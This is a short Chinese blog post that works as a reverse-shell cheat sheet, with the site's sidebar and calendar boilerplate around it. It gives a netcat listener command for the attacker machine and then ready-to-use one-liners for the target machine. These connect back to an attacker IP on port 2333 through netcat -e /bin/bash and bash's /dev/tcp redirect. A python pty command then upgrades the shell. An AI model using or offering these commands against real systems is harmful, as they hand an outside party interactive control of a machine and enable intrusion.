反弹Shell,看这一篇就够了

https://xz.aliyun.com/t/9488


攻击机开启本地监听:

netcat -lvvp 2333

目标机主动连接攻击机:

netcat 47.xxx.xxx.187 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

bash -i >& /dev/tcp/47.xxx.xxx.187/2333 0>&1

借助于python默认包含的一个pty标准库来获取一个标准的虚拟终端环境
python -c "import pty;pty.spawn('/bin/bash')"

posted on   katago  阅读(58)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
历史上的今天:
2018-05-31 Java代理和动态代理机制分析和应用
2012-05-31 dosfstools linux 下 vfat 文件系统检测
2011-05-31 用安全存储器实现FPGA的身份识别及防拷贝
2011-05-31 主板结构
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示